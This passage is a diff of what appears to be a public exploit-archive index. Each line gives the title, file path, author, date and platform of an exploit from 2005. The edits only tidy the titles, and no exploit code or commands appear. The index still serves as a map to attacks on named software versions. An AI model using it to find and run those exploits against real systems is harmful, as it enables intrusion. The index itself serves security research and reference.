Service",2005-08-05,basher13,windows,dos,0 1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 1140,platforms/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 -1142,platforms/php/webapps/1142.php,"Wordpress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps,0 +1142,platforms/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps,0 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 -1145,platforms/php/webapps/1145.pm,"Wordpress 1.5.1.3 - Remote Code Execution Exploit (Metasploit)",2005-08-10,str0ke,php,webapps,0 +1145,platforms/php/webapps/1145.pm,"WordPress 1.5.1.3 - Remote Code Execution (Metasploit)",2005-08-10,str0ke,php,webapps,0 1146,platforms/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,anonymous,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 @@ -975,16 +975,16 @@ id,file,description,date,author,platform,type,port 1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - (adduser) Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0 -1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 - Remote Denial of Service (all platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0 -1178,platforms/windows/remote/1178.c,"Microsoft Windows IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 +1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 - Remote Denial of Service (All Platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0 +1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish)",2005-08-25,RoMaNSoFt,windows,remote,445 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French)",2005-08-25,"Fabrice Mourron",windows,remote,445 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 - UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (sparc) - (ld.so.1) Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80 -1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Privilege Escalation",2005-08-30,vade79,osx,local,0 -1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - (-lib) Privilege Escalation",2005-08-30,vade79,osx,local,0 +1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OS X) - Privilege Escalation",2005-08-30,vade79,osx,local,0 +1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OS X) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0 1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client Side Buffer Overflow",2005-08-30,vade79,linux,local,0 1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0 1189,platforms/php/webapps/1189.c,"vBulletin 3.0.8 - Accessible Database Backup Searcher (update 3)",2005-08-31,str0ke,php,webapps,0 @@ -994,31 +994,31 @@ id,file,description,date,author,platform,type,port 1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote,0 1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - (Get Request) Denial of Service",2005-09-05,tracewar,linux,dos,0 -1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 +1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0 1200,platforms/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution Exploit (1)",2005-09-07,rgod,php,webapps,0 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution Exploit",2005-09-07,basher13,windows,remote,0 1202,platforms/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 1204,platforms/multiple/dos/1204.html,"Mozilla Products - (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 -1207,platforms/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution Exploit",2005-09-09,rgod,php,webapps,0 +1207,platforms/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily 1.4.0 - SQL Injection",2005-03-27,basher13,php,webapps,0 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 1210,platforms/windows/remote/1210.pm,"WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos,0 1213,platforms/multiple/dos/1213.c,"Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service",2005-09-12,nitr0us,multiple,dos,0 -1214,platforms/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution Exploit",2005-09-13,rgod,php,webapps,0 +1214,platforms/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution",2005-09-13,rgod,php,webapps,0 1215,platforms/linux/local/1215.c,"Wireless Tools 26 - (iwconfig) Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0 1217,platforms/php/webapps/1217.pl,"phpWebSite 0.10.0 - (module) SQL Injection",2005-09-15,RusH,php,webapps,0 1218,platforms/windows/dos/1218.c,"Stoney FTPd - Denial of Service (rxBot mods ftpd)",2005-09-16,D-oNe,windows,dos,0 -1219,platforms/php/webapps/1219.c,"PHP-Nuke 7.8 - (modules.php) SQL Injection",2005-09-16,RusH,php,webapps,0 +1219,platforms/php/webapps/1219.c,"PHP-Nuke 7.8 - 'modules.php' SQL Injection",2005-09-16,RusH,php,webapps,0 1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - (HEAD) Denial of Service",2005-09-16,karak0rsan,windows,dos,0 1221,platforms/php/webapps/1221.php,"CuteNews 1.4.0 - (shell inject) Remote Command Execution Exploit",2005-09-17,rgod,php,webapps,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0 1223,platforms/windows/remote/1223.c,"Mercury Mail 4.01a (Pegasus) - IMAP Buffer Overflow",2005-09-20,c0d3r,windows,remote,143 1224,platforms/windows/remote/1224.html,"Mozilla Browsers - 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (2)",2005-09-22,Skylined,windows,remote,0 -1225,platforms/php/webapps/1225.php,"My Little Forum 1.5 - (searchstring) SQL Injection",2005-09-22,rgod,php,webapps,0 +1225,platforms/php/webapps/1225.php,"My Little Forum 1.5 - (SearchString) SQL Injection",2005-09-22,rgod,php,webapps,0 1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - (User-Agent) Remote Shell Injection",2005-09-23,rgod,php,webapps,0 1227,platforms/php/webapps/1227.php,"MailGust 1.9 - (board takeover) SQL Injection",2005-09-24,rgod,php,webapps,0 1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation",2005-09-24,kingcope,linux,local,0 @@ -1036,12 +1036,12 @@ id,file,description,date,author,platform,type,port 1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0 1242,platforms/linux/remote/1242.pl,"xine-lib 1.1 - (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 1243,platforms/windows/remote/1243.c,"CA iGateway - (debug mode) Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 -1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Remote Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 +1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection",2005-10-10,rgod,php,webapps,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - (Hijacking Command) Denial of Service",2005-10-11,basher13,windows,dos,0 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0 -1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - (quicklist.php) Remote Code Execution Exploit",2005-10-14,rgod,php,webapps,0 +1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - (quicklist.php) Remote Code Execution",2005-10-14,rgod,php,webapps,0 1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 1252,platforms/asp/webapps/1252.htm,"MuOnline Loopholes Web Server - 'pkok.asp' SQL Injection",2005-10-15,nukedx,asp,webapps,0 1253,platforms/multiple/dos/1253.html,"Mozilla (Firefox 1.0.7) (Thunderbird 1.0.6) - Denial of Service",2005-10-16,posidron,multiple,dos,0 @@ -1051,22 +1051,22 @@ id,file,description,date,author,platform,type,port 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) - Denial of Service",2005-10-17,Kubbo,multiple,dos,0 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection",2005-10-18,rgod,linux,remote,0 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 -1260,platforms/windows/remote/1260.pm,"Microsoft Windows IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 +1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution Exploit (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722 1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 (Windows/x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",windows,remote,13722 -1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722 +1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OS X) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 < 0.10.12 SLIMP3 - Remote Buffer Overflow (PoC)",2005-10-20,Sowhat,windows,dos,0 -1267,platforms/linux/local/1267.c,"XMail 1.21 - (-t Command Line Option) Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0 -1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - (register users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 -1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play - (Umpnpmgr.dll) Denial of Service (MS05-047) (1)",2005-10-21,anonymous,windows,dos,0 +1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0 +1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - (Register Users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 +1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)",2005-10-21,anonymous,windows,dos,0 1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0 -1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play - (Umpnpmgr.dll) Denial of Service (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 +1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0 1273,platforms/php/webapps/1273.pl,"TClanPortal 1.1.3 - 'id' SQL Injection",2005-10-26,Devil-00,php,webapps,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote Denial of Service",2005-10-27,Expanders,hardware,dos,0 -1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6.0 - (mshtmled.dll) Denial of Service",2005-10-28,"Tom Ferris",windows,dos,0 +1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6 - 'mshtmled.dll' Denial of Service",2005-10-28,"Tom Ferris",windows,dos,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0 1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit",2005-10-31,RusH,php,webapps,0 1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 @@ -1085,7 +1085,7 @@ id,file,description,date,author,platform,type,port 1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x - module (vBulletin/IPB) SQL Injection",2005-11-06,B~HFH,php,webapps,0 -1297,platforms/linux/local/1297.py,"F-Secure Internet Gatekeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0 +1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution Exploit",2005-11-07,rgod,php,webapps,0 1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3 / 10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0 @@ -1106,9 +1106,9 @@ id,file,description,date,author,platform,type,port 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 - Search Module SQL Injection",2005-11-16,anonymous,php,webapps,0 1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - (imapd) Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",windows,dos,0 1328,platforms/windows/dos/1328.c,"Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos,0 -1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - (config.php) SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 +1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 1330,platforms/windows/remote/1330.c,"freeFTPd 1.0.8 - (USER) Remote Buffer Overflow",2005-11-17,Expanders,windows,remote,21 -1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - (Action) Denial of Service",2005-11-18,BassReFLeX,multiple,dos,0 +1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - 'action' Denial of Service",2005-11-18,BassReFLeX,multiple,dos,0 1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging Buffer Overflow Exploit (Metasploit)",2005-11-20,y0,windows,remote,143 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)",2005-11-20,"H D Moore",hardware,remote,80 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos,0 @@ -1118,57 +1118,57 @@ id,file,description,date,author,platform,type,port 1340,platforms/php/webapps/1340.php,"eFiction 2.0 - (Fake .gif) Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 1341,platforms/windows/dos/1341.c,"Microsoft Windows - MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0 1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 -1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile - (gdi32.dll) Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 +1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile - 'gdi32.dll' Denial of Service (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1345,platforms/php/dos/1345.php,"Xaraya 1.0.0 RC4 - create() Denial of Service",2005-11-29,rgod,php,dos,0 -1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 +1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 -1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Pre-Authenticated Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0 -1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - (password_forgotten.php) SQL Injection",2005-12-02,rgod,php,webapps,0 +1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0 +1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String Exploit",2005-12-03,"Kevin Finisterre",linux,remote,0 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0 1357,platforms/windows/remote/1357.diff,"WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow",2005-12-04,"Kevin Finisterre",windows,remote,0 1358,platforms/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0 -1359,platforms/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution Exploit (1)",2005-12-07,rgod,php,webapps,0 +1359,platforms/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,php,webapps,0 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - (Env Variable) Local Exploit",2005-12-07,c0ntex,solaris,local,0 1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0 1362,platforms/windows/dos/1362.html,"Mozilla Firefox 1.5 - (history.dat) Looping (PoC)",2005-12-07,ZIPLOCK,windows,dos,0 -1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution Exploit",2005-12-08,rgod,php,webapps,0 -1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution Exploit (2)",2005-12-08,pointslash,php,webapps,0 +1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0 +1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0 1365,platforms/windows/remote/1365.pm,"Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow (Metasploit)",2005-12-08,y0,windows,remote,8080 1366,platforms/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)",2005-12-09,"H D Moore",windows,remote,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0 -1369,platforms/multiple/remote/1369.html,"Mozilla Firefox 1.04 - compareTo() Remote Code Execution Exploit",2005-12-12,"Aviv Raff",multiple,remote,0 -1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution Exploit",2005-12-12,rgod,php,webapps,0 +1369,platforms/multiple/remote/1369.html,"Mozilla Firefox 1.04 - compareTo() Remote Code Execution",2005-12-12,"Aviv Raff",multiple,remote,0 +1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution",2005-12-12,rgod,php,webapps,0 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0 -1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6.0 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 +1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0 1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 1374,platforms/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)",2005-12-15,"Mariano Nuñez",windows,remote,0 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 -1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 -1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service (Perl) (2)",2005-12-19,kokanin,windows,dos,0 +1376,platforms/windows/dos/1376.c,"Microsoft IIS - Malformed HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0 +1377,platforms/windows/dos/1377.pl,"Microsoft IIS - Malformed HTTP Request Denial of Service (Perl) (2)",2005-12-19,kokanin,windows,dos,0 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow",2005-12-19,muts,windows,remote,0 -1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 +1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - (APPE) Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21 -1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 +1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Remote Cross-Site Scripting Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter SQL Injection",2005-12-23,krasza,php,webapps,0 1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - (cat) SQL Injection",2005-12-24,rgod,php,webapps,0 1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 -1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll datasrc) Denial of Service",2005-12-27,BuHa,windows,dos,0 +1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - (mshtml.dll datasrc) Denial of Service",2005-12-27,BuHa,windows,dos,0 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 -1391,platforms/windows/remote/1391.pm,"Windows XP/2003 - Metafile Escape() Code Execution Exploit (Metasploit)",2005-12-27,"H D Moore",windows,remote,0 -1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 - (mshtml.dll div) Denial of Service",2005-12-29,rgod,windows,dos,0 +1391,platforms/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote,0 +1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - (mshtml.dll div) Denial of Service",2005-12-29,rgod,windows,dos,0 1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 -1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service (cpp)",2005-12-29,Lympex,windows,dos,0 +1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service (cpp)",2005-12-29,Lympex,windows,dos,0 1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation",2005-12-30,alert7,linux,local,0 1398,platforms/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 